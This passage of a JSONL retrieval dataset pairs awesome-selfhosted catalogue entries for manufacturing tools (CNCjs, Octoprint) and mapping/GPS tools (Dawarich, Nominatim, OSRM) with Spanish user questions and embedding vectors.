0.076, -0.04509, 0.01442, -0.05156, 0.01612, 0.00825, -0.05642, -0.08779, -0.08748, -0.08067, 0.02756, -0.04305, -0.03329, -0.07438, -0.09123, -0.02451, 0.03442, -0.06691, 0.00675, 0.05097, 0.07355, 0.03804, 0.06272, 0.02978, -0.05926, -0.0534, 0.01109, -0.01213, 0.02644, 0.05055, -0.00061, 0.02457, -0.08722, -0.01983, -0.00808, -0.01037, 0.07658, 0.06046, -0.00189, 0.02204, 0.01478, -0.04345, -0.09617, -0.05862, -0.07399, -0.05374, -0.00402, -0.01804, 0.0457, -0.06243, 0.02722, -0.04056, 0.02718, -0.02416, -0.0049, -0.03664, -0.06833, 0.04603, 0.02446, 0.00853, -0.05677, 0.03505, -0.00191, 0.04085, 0.00384, 0.0344, -0.04219, 0.13855, -0.00179, 0.01976, -0.04873, 0.0026, -0.01472, 0.00841, -0.08341, -0.01553, 0.04019, -0.01869, -0.05587, 0.02142, -0.05538, 0.02321, 0.02054, 0.06567, 0.04685, -0.00594, 0.03199, 0.0101, -0.04962, 0.01634, 0.03637, -0.01024, -0.03953, 0.04075, -0.07191, -0.01938, 0.06273, 0.02541, -0.09858, 0.00917, 0.09651, -0.02654, 0.01206, -0.00031, 0.04594, 0.03078, -0.03402, 0.14009, -0.03135, 0.01422, 0.02066, -7e-05, 0.03382, 0.02591, -0.04187, -0.0029, 0.00752, 0.07796, -0.00154, -0.00147, 0.01916, -0.00894, 0.06375, 0.06032, 0.03278, -0.01751, 0.00817, -0.00095, -0.00412, 0.07903, -0.024, -0.00674, -0.06114, -0.06459, -0.02588, 0.01094, 0.05797, -0.02541, -0.07081, -0.04187, -0.01194, -0.02102, -0.03143, 0.00803, -0.06958, 0.00019, -0.02629, 0.06591, -0.05194, -0.00156, -0.01369]} -{"tipo": "pregunta", "herramienta": "Manufacturing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Manufacturing", "tema": "manufacturing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Manufacturing: CNCjs β€” Web interface for CNC milling controllers running Grbl, Smoothieware, or TinyG [MIT, Nodejs]. Fluidd β€” Lightweight & responsive user interface for Klipper, the 3D printer firmware [GPL-3.0, Docker/Nodejs]. LinuxCNC β€” Linux based CNC machine controller. It can drive milling machines, lathes, 3D printers, laser cutters, plasma cutters, robot arms, hexapods, and more [GPL-2.0/LGPL-3.0, C/deb]. Mainsail β€” Modern and responsive user interface for the Klipper 3D printer firmware. Control and monitor your printer from everywhere, from any device [GPL-3.0, Docker/Python]. Manyfold β€” Digital asset manager for 3d print files; STL, OBJ, 3MF and more [MIT, Docker]. Octoprint β€” Snappy web interface for controlling consumer 3D printers [AGPL-3.0, Docker/Python].", "indexar": "que programa funciona como interfaz web para controlar mΓ‘quinas CNC?", "v": [0.05464, 0.00346, -0.09523, -0.26756, -0.0177, -0.18342, -0.10317, 0.13878, -0.06245, -0.0081, -0.03721, -0.12171, -0.0001, -0.08944, -0.03728, 0.0437, 0.0165, -0.16286, 0.04368, 0.07862, -0.1006, -0.0579, 0.02298, -0.07857, -0.04805, 0.13372, -0.04383, -0.05712, -0.16879, 0.01464, 0.01741, -0.04527, 0.231, 0.03179, -0.00765, -0.03273, -0.03079, 0.01587, 0.11601, 0.06869, -0.02576, 0.03329, -0.14523, 0.01421, 0.21663, -0.03455, 0.09306, -0.11091, 0.02471, -0.04088, -0.07043, -0.09235, -0.05685, 0.04579, -0.01835, -0.12832, 0.00898, -0.02948, -0.0207, -0.09185, -0.0407, 0.04869, -0.08915, 0.04506, -0.098, -0.0039, 0.00605, -0.07042, -0.01343, 0.04192, -0.02909, 0.03769, -0.00046, -0.04358, 0.0716, -0.04272, -0.00909, 0.05834, 0.10555, -0.06834, 0.00376, 0.01933, -0.06657, -0.001, 0.01253, 0.01977, 0.02618, -0.11212, -0.0716, -0.03697, 0.02352, 0.05462, 0.05329, -0.00282, 0.14553, -0.04396, 0.02144, 0.05421, 0.07316, -0.00897, 0.10985, 0.0044, -0.11952, 0.13422, -0.06759, 0.08376, 0.15513, -0.02515, -0.08297, 0.01203, 0.0079, -0.00154, -0.04389, -0.04548, -0.07562, 0.01401, -0.00585, 0.00644, -0.00707, -0.12092, -0.03204, 0.09228, 0.01328, -0.01933, 0.07422, 0.05387, 0.00699, 0.1063, -0.04427, 0.00976, 0.01623, -0.05748, -0.06281, -0.00937, 0.00416, -0.05004, 0.01681, -0.06791, -0.02753, -0.03939, 0.01932, 0.06349, -0.01932, -0.02776, 0.04384, -0.04941, 0.01862, -0.06586, 0.01406, 0.00544, 0.10922, 0.0035, 0.0308, 0.01658, -0.04857, -0.01214, 0.00524, 0.01057, -0.08017, -0.0013, -0.05099, -0.00726, -0.0644, -0.00644, 0.01324, 0.01499, -0.08647, 0.05933, 0.05509, 0.04545, -0.00302, 0.05854, 0.11168, -0.02523, -0.02555, 0.03867, 0.02579, -0.04011, 0.08548, -0.02446, -0.03033, 0.07498, 0.08855, -0.01837, -0.05315, -0.01687, -0.04431, 0.03981, -0.04202, 0.00942, 0.03002, 0.02432, -0.04248, -0.05192, 0.06338, 0.02404, -0.03509, 0.03479, 0.02331, -0.02903, 0.01297, 0.01762, 0.01718, -0.02848, 0.00075, 0.09382, 0.04019, -0.03167, 0.01634, 0.03628, 0.05851, -0.00704, 0.01485, 0.01718, -0.03049, 0.01439, -0.03013, -0.01482, 0.0069, -0.04046, 0.03127, -0.0989, 0.00262, 0.05093, 0.00733, -0.09715, 0.02363, 0.06711, 0.06925, 0.01035, -0.00684, -0.04793, 0.02476, -0.0065, 0.02604, -0.0199, 0.00787, -0.04314, -0.00311, -0.04175, -0.02979, 0.0352, 0.0344, -0.04015, -0.02325, 7e-05, -0.01963, -0.06344, -0.0301, 0.01763, -0.03527, -0.00313, 0.01176, 0.01503, -0.01911, 0.07506]} -{"tipo": "pregunta", "herramienta": "Manufacturing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Manufacturing", "tema": "manufacturing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Manufacturing: CNCjs β€” Web interface for CNC milling controllers running Grbl, Smoothieware, or TinyG [MIT, Nodejs]. Fluidd β€” Lightweight & responsive user interface for Klipper, the 3D printer firmware [GPL-3.0, Docker/Nodejs]. LinuxCNC β€” Linux based CNC machine controller. It can drive milling machines, lathes, 3D printers, laser cutters, plasma cutters, robot arms, hexapods, and more [GPL-2.0/LGPL-3.0, C/deb]. Mainsail β€” Modern and responsive user interface for the Klipper 3D printer firmware. Control and monitor your printer from everywhere, from any device [GPL-3.0, Docker/Python]. Manyfold β€” Digital asset manager for 3d print files; STL, OBJ, 3MF and more [MIT, Docker]. Octoprint β€” Snappy web interface for controlling consumer 3D printers [AGPL-3.0, Docker/Python].", "indexar": "cual es una herramienta para gestionar y organizar archivos de impresiΓ³n 3D como STL?", "v": [0.00626, -0.04901, -0.10946, -0.20769, 0.04892, -0.12594, -0.06064, 0.03258, -0.00678, 0.06027, -0.16392, -0.10578, 0.13049, -0.16204, -0.00585, 0.04245, 0.11981, -0.22684, -0.04568, 0.05367, -0.06906, 0.13146, -0.05361, -0.05461, -0.07313, -0.06383, 0.10264, 0.01793, -0.23553, 0.07058, -0.07392, 0.05082, 0.07721, -0.12289, 0.00051, -0.05259, -0.0482, 0.12795, -0.08636, 0.07784, -0.11853, 0.07222, -0.10749, 0.12843, 0.05513, -0.02515, 0.05884, 0.07996, 0.01921, 0.08459, -0.09993, -0.043, -0.04357, 0.04652, 0.00574, -0.11233, 0.02927, -0.15815, 0.01292, -0.01698, -0.07615, 0.02814, -0.03794, 0.0367, -0.04505, 0.00864, -0.01231, 0.00839, -0.10761, 0.07958, -0.02026, -0.01326, -0.02118, -0.04659, 0.02696, -0.01002, 0.0603, 0.07804, -0.02495, -0.00317, 0.01171, -0.03305, -0.0453, -0.0161, -0.02279, -0.1334, 0.01199, -0.01626, -0.03502, -0.05829, -0.04818, -0.08542, -0.04506, -0.08565, 0.00782, -0.02533, 0.092, -0.02302, 0.02256, -0.01271, -0.01212, -0.0526, -0.09743, 0.06618, -0.02782, 0.04902, -0.05908, 0.05311, 0.01595, -0.02191, 0.03194, 0.05793, 0.09333, 0.14362, -0.05192, 0.0144, 0.10751, -0.04027, 0.03682, -0.06226, 0.02983, 0.01154, -0.01292, -0.04889, 0.0825, 0.00938, 0.03134, 0.10981, -0.09618, -0.02246, 0.02192, -0.03629, -0.05639, 0.03929, -0.06523, -0.05449, 0.00531, -0.09409, -0.01257, -0.09764, -0.04317, 0.04321, -0.00642, -0.05611, 0.07483, -0.01074, 0.03433, -0.02087, -0.03955, 0.06286, 0.02063, -0.05979, 0.04499, 0.02207, -0.02766, 0.05277, -0.04783, -0.07343, -0.06774, 0.01713, -0.11362, -0.04194, 0.03703, 0.0328, 0.01907, -0.06209, 0.01719, 0.04485, -0.0259, -0.02242, 0.01665, -0.04735, -0.00816, -0.01657, 0.01481, -0.06701, -0.04763, -0.05604, 0.04793, -0.01519, -0.00016, 0.02641, -0.01781, -0.00729, 0.03249, -0.04216, 0.06701, 0.04287, -0.00725, -0.01299, 0.06524, 0.05883, -0.03305, -0.08674, 0.09373, -0.05892, -0.02213, -0.0574, 0.03822, -0.01824, -0.02509, -0.02182, -0.00845, -0.00706, 0.00144, 0.01875, -0.05579, 0.0585, 0.02657, -0.01588, 0.02776, 0.0367, 0.03135, -0.03648, 0.01186, -0.02784, -0.02836, 0.00575, 0.01057, -0.00597, 0.06063, 0.01266, 0.01728, -0.08653, -0.02622, -0.07424, 0.0233, -0.00975, 0.02349, -0.04372, -0.00283, 0.08617, 0.03928, 0.07794, 0.01138, -0.01233, 0.07645, -0.06561, -0.01668, -0.05793, -0.02085, 0.06018, 0.00251, 0.01655, -0.05201, 0.01137, -0.01007, -0.0091, -0.07426, -0.06073, 0.01052, 0.04876, 0.03351, 0.0497, 0.03394, -0.03763]} -{"tipo": "pregunta", "herramienta": "Manufacturing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Manufacturing", "tema": "manufacturing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Manufacturing: CNCjs β€” Web interface for CNC milling controllers running Grbl, Smoothieware, or TinyG [MIT, Nodejs]. Fluidd β€” Lightweight & responsive user interface for Klipper, the 3D printer firmware [GPL-3.0, Docker/Nodejs]. LinuxCNC β€” Linux based CNC machine controller. It can drive milling machines, lathes, 3D printers, laser cutters, plasma cutters, robot arms, hexapods, and more [GPL-2.0/LGPL-3.0, C/deb]. Mainsail β€” Modern and responsive user interface for the Klipper 3D printer firmware. Control and monitor your printer from everywhere, from any device [GPL-3.0, Docker/Python]. Manyfold β€” Digital asset manager for 3d print files; STL, OBJ, 3MF and more [MIT, Docker]. Octoprint β€” Snappy web interface for controlling consumer 3D printers [AGPL-3.0, Docker/Python].", "indexar": "con que puedo controlar mi impresora 3D desde cualquier dispositivo de forma fΓ‘cil?", "v": [0.0944, 0.08707, -0.17377, -0.07076, 0.06813, 0.01219, -0.00733, 0.0819, -0.09288, -0.05094, -0.03617, -0.02899, 0.00829, -0.14679, -0.0374, -0.11721, 0.00643, -0.13835, -0.0227, -0.00707, -0.00455, -0.05613, -0.06183, -0.07775, -0.00076, 0.08103, 0.02762, 0.05427, -0.25894, -0.07114, -0.01516, 0.04943, 0.08623, -0.00834, -0.15428, -0.07057, -0.07352, 0.09295, 0.04199, 0.05827, -0.00905, 0.02861, -0.03999, 0.01212, 0.14039, 0.03835, 0.07433, 0.01227, -0.06202, 0.06131, -0.10634, -0.05078, -0.03828, 0.08901, -0.13329, -0.11428, 0.14963, -0.04042, 0.03304, -0.0344, 0.02356, -0.07086, -0.02563, 0.04964, -0.11159, 0.01794, -0.02672, -0.00126, -0.05901, -0.03971, -0.01504, -0.08588, -0.05098, -0.02586, 0.0797, 0.0222, -0.1613, 0.04202, 0.09851, 0.02366, -0.04605, -0.03912, -0.04204, -0.12875, 0.02597, -0.02739, -0.02594, -0.04482, -0.10595, -0.04657, 0.02126, -0.06377, 0.04096, -0.05269, -0.0571, -0.01196, -0.00706, 0.11799, -0.00795, 0.01174, 0.07675, 0.02421, -0.09454, 0.11386, -0.02648, -0.05997, -0.01518, -0.02892, 0.00486, -0.08561, -0.0168, 0.0496, 0.00332, 0.03264, -0.06936, 0.00065, 0.0454, -0.00308, -0.00634, -0.02888, -0.00219, -0.0085, 0.04078, -0.02712, 0.17236, 0.0136, -0.03164, 0.06116, -0.02505, -0.02935, 0.02174, -0.02916, 0.03119, -0.03089, 0.00095, 0.00231, -0.06802, -0.00993, 0.01126, -0.02467, 0.01962, 0.0773, 0.01602, -0.09768, 0.05207, -0.12258, 0.02053, 0.02829, -0.04716, 0.03469, -0.05176, 0.00203, 0.04203, 0.0456, -0.00301, 0.07562, 0.06203, -0.06011, -2e-05, 0.05955, -0.07758, 0.05301, -0.00517, 0.00794, 0.01233, -0.03433, -0.06194, -0.03862, 0.03014, 0.02224, -0.14362, -0.01446, 0.01783, -0.02245, 0.0443, -0.03101, -0.00907, 0.00596, 0.03709, -0.03575, -0.06282, 0.15701, -0.05123, -0.04692, 0.01501, -0.00839, 0.01963, 0.05761, 0.07172, -0.02612, 0.08181, 0.09673, -0.03305, -0.06683, 0.11053, -0.09877, -0.00331, -0.0235, 0.01348, -0.08073, -0.0047, 0.02307, 0.00671, -0.02206, 0.01969, 0.02438, -0.06024, 0.03206, -0.02438, -0.01497, 0.02278, 0.04046, 0.0652, -0.02657, 0.02679, 0.02123, 0.03733, -0.03589, -0.00409, -0.02815, 0.14025, -0.01374, 0.07404, -0.02441, 0.01726, -0.08254, 0.06155, -0.01426, 0.03494, -0.04178, 0.01928, 0.10928, 0.0241, -0.0051, 0.00355, -0.00985, 0.07677, -0.06256, -0.053, -0.06782, 0.00814, 0.0819, 0.01578, -0.01039, -0.05202, 0.01149, -0.07291, -0.00192, -0.08435, -0.12763, 0.00684, 0.10417, 0.07928, 0.007, -0.01207, -0.0296]} -{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): AdventureLog β€” Travel tracker and trip planner [GPL-3.0, Docker]. AirTrail β€” Personal flight tracking system [GPL-3.0, Docker/Nodejs]. Bicimon β€” Bike Speedometer as Progressive Web App [MIT, Javascript]. Dawarich β€” Visualize your location history, track your movements, and analyze your travel patterns with complete privacy and control (alternative to Google Timeline a.k.a. Google Location History) [AGPL-3.0, Docker]. Geo2tz β€” Get the timezone from geo coordinates (lat, lon) [MIT, Go/Docker]. GraphHopper β€” Fast routing library and server using OpenStreetMap [Apache-2.0, Java]. NextGIS Web β€” Web GIS server for geospatial data management, web map publishing, and QGIS-centered collaborative workflows [GPL-3.0, Docker]. Nominatim β€” Server application for geocoding (address -> coordinates) and reverse geocoding (coordinates -> address) on OpenStreetMap data [GPL-2.0, C].", "indexar": "ΒΏQuΓ© programa sirve para rastrear mis viajes y planificar rutas?", "v": [0.19605, 0.007, -0.07494, -0.12488, 0.16848, -0.07972, 0.08258, -0.13424, -0.00197, -0.14275, -0.02034, -0.09337, 0.08288, 0.00486, 0.09749, 0.04729, 0.02659, 0.13922, 0.10701, -0.01802, -0.04896, -0.07891, 0.00576, 0.04629, -0.14639, -0.01411, 0.17099, -0.06804, -0.10062, -0.02829, -0.02007, 0.09485, 0.06422, -0.10548, 0.00912, -0.04381, 0.12574, 0.03578, -0.06781, -0.06484, -0.00633, -0.02945, -0.01622, 0.07386, -0.01155, -0.08387, -0.05576, -0.09282, -0.01835, 0.01422, 0.00827, 0.0517, -0.00179, 0.05711, 0.16432, 0.01501, 0.00601, -0.10918, -0.06369, 0.01097, 0.02527, -0.05485, 0.04607, 0.02559, 0.07586, -0.03954, 0.07461, -0.04467, -0.04235, -0.04938, -0.09372, 0.07924, 0.10122, 0.03229, -0.0306, -0.02862, 0.08432, 0.06175, 0.11224, 0.02071, 0.13052, 0.02457, -0.07224, 0.10112, -0.01812, 0.00898, 0.11194, 0.03472, 0.00291, 0.03844, -0.07624, 0.05101, 0.01929, 0.10856, -0.00632, 0.03865, 0.15111, 0.04218, 0.06308, 0.07055, -0.00137, -0.12282, -0.04163, 0.13989, -0.13019, 0.15825, 0.06021, 0.00445, -0.08982, 0.10415, 0.02116, -0.00813, -0.05389, -0.07012, -0.03953, -0.02445, -0.03297, -0.01988, 0.04824, -0.07652, -0.10295, 0.09617, -0.05471, 0.05263, 0.06009, 0.02957, -0.06747, 0.13523, -0.00165, 0.02295, 0.03346, -0.00065, -0.02852, -0.03607, -0.05841, -0.06326, 0.06128, 0.01632, 0.06433, -0.01708, 0.00967, 0.02883, -0.05249, -0.01699, -0.02547, 0.04592, 0.05644, -0.03062, -0.04616, 0.03873, -0.05229, 0.04356, 0.04265, 0.03218, 0.03967, -0.00814, -0.00339, -0.09508, -0.0902, 0.08712, 0.0009, 0.02617, 0.00391, -0.02676, 0.16325, -0.05684, 0.00705, -0.04391, 0.08553, 0.04431, 0.01375, 0.02629, 0.08665, -0.10489, -0.00335, -0.01839, -0.0043, -0.02651, 0.04283, 0.01509, -0.07992, 0.01613, 0.04214, 0.05313, -0.02462, 0.00652, -0.01269, 0.00603, 0.02964, -0.01155, -0.00038, -0.03512, 0.03728, -0.02983, -0.01718, -0.05799, 0.02397, 0.00159, 0.00171, -0.01733, 0.01657, -0.05258, 0.01094, 0.01726, 0.04534, 0.08086, -0.01307, 0.0108, 0.05527, 0.12847, -0.00013, -0.03755, 0.05353, -0.02838, -0.04692, 0.00662, -0.00316, 0.03219, 0.05721, 0.0558, 0.00772, 0.05227, -0.01935, 0.02647, 0.08894, -0.00572, 0.02394, -0.01552, 0.02236, 0.01112, 0.04089, -0.02443, -0.03259, -0.01751, -0.01828, -0.00719, -0.00057, -0.0185, -0.00991, -0.023, -0.01039, 0.01743, 0.01731, -0.05382, -0.03363, -0.00154, -0.03457, 0.04366, 0.02808, -0.05094, 0.00332, 0.04345, 0.07689, 7e-05, 0.02711, -0.02427]} -{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): AdventureLog β€” Travel tracker and trip planner [GPL-3.0, Docker]. AirTrail β€” Personal flight tracking system [GPL-3.0, Docker/Nodejs]. Bicimon β€” Bike Speedometer as Progressive Web App [MIT, Javascript]. Dawarich β€” Visualize your location history, track your movements, and analyze your travel patterns with complete privacy and control (alternative to Google Timeline a.k.a. Google Location History) [AGPL-3.0, Docker]. Geo2tz β€” Get the timezone from geo coordinates (lat, lon) [MIT, Go/Docker]. GraphHopper β€” Fast routing library and server using OpenStreetMap [Apache-2.0, Java]. NextGIS Web β€” Web GIS server for geospatial data management, web map publishing, and QGIS-centered collaborative workflows [GPL-3.0, Docker]. Nominatim β€” Server application for geocoding (address -> coordinates) and reverse geocoding (coordinates -> address) on OpenStreetMap data [GPL-2.0, C].", "indexar": "Con quΓ© puedo visualizar mi historial de ubicaciΓ³n con privacidad?", "v": [0.0089, 0.18527, -0.1032, -0.13288, 0.04328, -0.12559, -0.04031, -0.07128, -0.08793, -0.1212, 0.04157, -0.10911, 0.07592, 0.05164, 0.05351, 0.02533, 0.15061, 0.00779, 0.06792, -0.0159, -0.07078, -0.02181, -0.0237, 0.01325, -0.04561, -0.05072, 0.09764, 0.07703, -0.13922, -0.14966, 0.04429, -0.00328, -0.07485, 0.05329, 0.01798, 0.08015, 0.06851, 0.09029, -0.05094, -0.05576, 0.07324, -0.0579, 0.04441, 0.11238, 0.1031, -0.06325, -0.11053, 0.01406, -0.10251, -0.07447, -0.02557, 0.05912, -0.0827, -0.0132, 0.06417, 0.03065, 0.07213, 0.0954, 0.15559, 0.12858, -0.02992, 0.02827, 0.00969, 0.1589, 0.03154, -0.14101, 0.05996, 0.04084, -0.05977, 0.04469, 0.02144, -0.01256, -0.05721, 0.03743, 0.01398, -0.04299, 0.00528, -0.00894, 0.02857, 0.06874, -0.02075, -0.00435, -0.06477, -0.00343, -0.0408, 0.04173, -0.01685, -0.06437, 0.02546, -0.09716, 0.08652, -0.00666, -0.08431, 0.02359, 0.01593, -0.01543, 0.05689, 0.02761, -0.09296, -0.00779, 0.04902, 0.09325, -0.00947, 0.16988, 0.10237, 0.04824, 0.03376, -0.08152, -0.01819, -0.12395, 0.01266, -0.03946, -0.1201, 0.00896, -0.0263, -0.06118, -0.10304, -0.03718, 0.08777, -0.06781, -0.05566, -0.00853, 0.00342, -0.05807, -0.02041, 0.12133, -0.08242, 0.05009, -0.05262, 0.04591, -0.01466, 0.0039, 0.00162, 0.02223, 0.09874, 0.05568, -0.1356, -0.03264, 0.05792, -0.04718, 0.04754, -0.01911, -0.00105, -0.00794, 0.07692, -0.03753, -0.02993, 0.01347, -0.05526, -0.00755, -0.0307, 0.03242, 0.04489, 0.02898, 0.02991, 0.03214, 0.029, -0.11469, 0.06578, -0.01704, 0.04368, 0.0181, -0.11862, 0.01256, 0.07747, -0.03086, 0.01139, -0.02063, 0.00774, -0.00114, -0.05666, 0.00706, -0.08401, -0.06675, 0.00386, -0.05811, 0.00147, -0.00382, 0.07949, -0.00479, 0.03379, -0.0042, 0.02134, -0.04415, -0.03276, -0.03202, -0.01104, 0.06133, 0.04351, 0.0058, -0.05524, 0.02313, 0.04536, 0.03493, -0.0258, -0.08437, -0.02761, -0.02568, 0.00999, 0.04083, 0.03769, 0.01867, -0.01218, 0.01918, 0.02829, 0.05921, -0.03748, -0.03917, -0.0555, -0.00845, 0.03596, 0.03692, 0.06308, -0.05635, -0.07455, -0.01448, 0.06856, -0.01641, 0.02086, -0.01989, -0.02721, 0.05652, 0.08422, -0.08659, 0.05358, -0.01926, 0.04049, 0.00416, 0.02819, 0.02959, 0.00136, 0.1215, -0.04749, -0.02789, 0.06934, 0.02102, -0.03821, -0.14866, -0.02388, -0.08935, 0.06116, 0.07053, 0.01838, -0.02472, 0.0412, -0.03774, -0.07257, 0.0752, -0.01294, -0.0826, -0.07275, 0.03023, 0.07542, -0.04469, 0.02614, -0.01763]} -{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): AdventureLog β€” Travel tracker and trip planner [GPL-3.0, Docker]. AirTrail β€” Personal flight tracking system [GPL-3.0, Docker/Nodejs]. Bicimon β€” Bike Speedometer as Progressive Web App [MIT, Javascript]. Dawarich β€” Visualize your location history, track your movements, and analyze your travel patterns with complete privacy and control (alternative to Google Timeline a.k.a. Google Location History) [AGPL-3.0, Docker]. Geo2tz β€” Get the timezone from geo coordinates (lat, lon) [MIT, Go/Docker]. GraphHopper β€” Fast routing library and server using OpenStreetMap [Apache-2.0, Java]. NextGIS Web β€” Web GIS server for geospatial data management, web map publishing, and QGIS-centered collaborative workflows [GPL-3.0, Docker]. Nominatim β€” Server application for geocoding (address -> coordinates) and reverse geocoding (coordinates -> address) on OpenStreetMap data [GPL-2.0, C].", "indexar": "ΒΏExiste una alternativa libre a Google Timeline para seguir mis movimientos?", "v": [-0.06084, 0.11897, -0.02338, -0.0194, -0.13029, -0.02504, -0.14227, 0.00814, -0.05942, -0.02449, -0.00628, -0.10359, 0.00196, 0.09495, 0.14477, -0.06326, 0.08442, -0.04534, 0.0151, -0.06841, -0.11637, 0.02828, -0.08436, -0.14439, 0.08094, -0.05055, -0.08827, -0.05272, -0.05365, -0.00985, -0.08367, -0.03522, -0.03698, -0.0485, -0.03505, 0.01031, 0.12692, 0.021, 0.09876, -0.11119, -0.01633, -0.06718, -0.1062, 0.07669, -0.10802, -0.04277, 0.02628, 0.08988, -0.04304, 0.01641, -0.01549, 0.07669, -0.07492, 0.05786, 0.05643, 0.03475, 0.15719, -0.17078, -0.16719, -0.08278, -0.03439, -0.04441, 0.12019, 0.04601, 0.02078, 0.04072, 0.10376, 0.03817, -0.14693, 0.13555, -0.04937, -0.07913, -0.04599, 0.01769, -0.04046, 0.03024, 0.02081, -0.04232, -0.10517, 0.14539, 0.00096, 0.01841, -0.03, 0.0398, -0.07278, -0.10156, 0.02858, -0.1519, -0.01683, 0.03086, 0.07658, 0.06769, -0.0524, 0.15432, -0.00076, -0.00262, -0.05196, -0.07429, 0.01102, 0.05434, 0.10928, 0.04947, -0.08049, -0.05009, -0.054, -0.04939, 0.02708, 0.05166, -0.1245, 0.01112, -0.02983, -0.01198, -0.02511, -0.05218, 0.06176, 0.01232, -0.06179, 0.05511, -0.10823, 0.01887, -0.01406, -0.06298, -0.1031, -0.0904, -0.01119, 0.03118, 0.02864, 0.06687, -0.02079, -0.04494, 0.04777, -0.02413, 0.00836, -0.08143, -0.07969, 0.11676, 0.11599, 0.0674, 0.10645, -0.03263, 0.05781, -0.06774, 0.0218, -0.00934, 0.03219, 0.00561, 0.07802, 0.01231, -0.0275, -0.05648, -0.06708, -0.04663, -0.01002, 0.0717, -0.00299, -0.02028, -0.10087, 0.01028, -0.07308, 0.00453, 0.03183, -0.01868, 0.00183, -0.07273, 0.00335, -0.02325, 0.04586, 0.05871, -0.07437, 0.01102, -0.00899, 0.05444, 0.11262, -0.0766, 0.0434, 0.00253, -0.00937, -0.04538, 0.06544, 0.00533, -0.03186, 0.07353, 0.06188, -0.03741, 0.01311, -0.09481, 0.01507, -0.03263, -0.022, 0.11286, -0.04392, -0.00228, 0.04776, -0.03279, -0.03673, -0.04633, 0.03057, -0.06645, -0.00361, 0.00969, -0.05934, -0.05153, 0.04001, 0.04217, -0.04957, -0.00942, 0.0306, 0.0547, 0.01336, 0.02102, 0.03285, 0.01666, 0.07859, 0.05673, -0.04378, -0.01603, 0.0194, -0.03346, -0.03913, -0.07383, -0.00342, 0.0616, -0.00508, 0.00505, -0.04317, 0.00422, 0.06307, 0.01944, -0.03698, 0.01417, 0.05637, 0.01189, -0.02313, 0.00857, 0.01656, -0.00103, 0.03906, 0.01961, 0.02096, 0.05067, 0.01054, 0.02379, -0.06247, 0.06394, -0.04968, -0.0191, -0.05493, -0.00405, 0.00988, -0.05209, -0.03201, 0.00815, 0.02987, -0.01512, 0.03121, 0.0563]} -{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): Open Source Routing Machine (OSRM) β€” High performance routing engine designed to run on OpenStreetMap data and offering an HTTP API, C++ library interface, and Nodejs wrapper [BSD-2-Clause, C++]. OpenRouteService β€” Route service with directions, isochrones, time-distance matrix, route optimization, etc [GPL-3.0, Docker/Java]. OpenStreetMap β€” Collaborative project to create a free editable map of the world [GPL-2.0, Ruby]. OpenTripPlanner β€” Multimodal trip planning software based on OpenStreetMap data and consuming published GTFS-formatted data to suggest routes using local public transit systems [LGPL-3.0, Java/Javascript]. OwnTracks Recorder β€” Store and access data published by [OwnTracks](https://owntracks.org/) location tracking apps [⚠, GPL-2.0, C/Lua/deb/Docker]. TileServer GL β€” Vector and raster maps with GL styles. Server side rendering by Mapbox GL Native. Map tile server for Mapbox GL JS, Android, iOS, Leaflet, OpenLayers, GIS via WMTS, etc [BSD-2-Clause, Nodejs/Docker].", "indexar": "que programa hay para hacer mapas y rutas de transporte pΓΊblico en casa?", "v": [0.09572, -0.00857, -0.06227, -0.18255, -0.0117, -0.02106, 0.12143, 0.03904, -0.03926, -0.0186, -0.13055, -0.07092, 0.13196, 0.05051, -0.03179, 0.01582, 0.07269, 0.05725, 0.16161, -0.06543, -0.07825, 0.01603, -0.02753, 0.0961, -0.07538, -0.00026, 0.14596, -0.06986, -0.10906, -0.02043, 0.04393, 0.0514, 0.01959, -0.11571, -0.01744, -0.08623, 0.12159, -0.01712, 0.00185, -0.11312, 0.00102, 0.00494, -0.01109, 0.01296, -0.02127, -0.10703, 0.00144, -0.11582, -0.10752, -0.13339, -0.10776, -0.11944, -0.00446, -0.03306, 0.06861, -0.04062, -0.0949, -0.1397, -0.09473, 0.03512, 0.02491, -0.04423, 0.00526, 0.04922, 0.0739, -0.03505, 0.11643, 0.04122, -0.06106, -0.05159, 0.00944, 0.03994, 0.11658, 0.0678, -0.06115, 0.02042, -0.08907, -0.00609, 0.02516, 0.0648, 0.12416, 0.06533, -0.13026, 0.03121, 0.03929, -0.03992, 0.06708, -0.05148, 0.07485, 0.0684, -0.04877, 0.08701, 0.06457, 0.1325, 0.02634, -0.06759, 0.09887, 0.0776, 0.03617, -0.04161, 0.014, -0.1058, -0.02987, 0.04702, -0.1211, 0.07014, 0.10859, -0.02702, -0.07507, 0.13554, 0.07395, 0.04262, -0.00279, -0.04288, 0.01032, -0.01478, -0.02346, 0.01106, 0.0292, -0.09174, -0.13895, 0.04322, 0.0032, -0.02592, 0.04284, 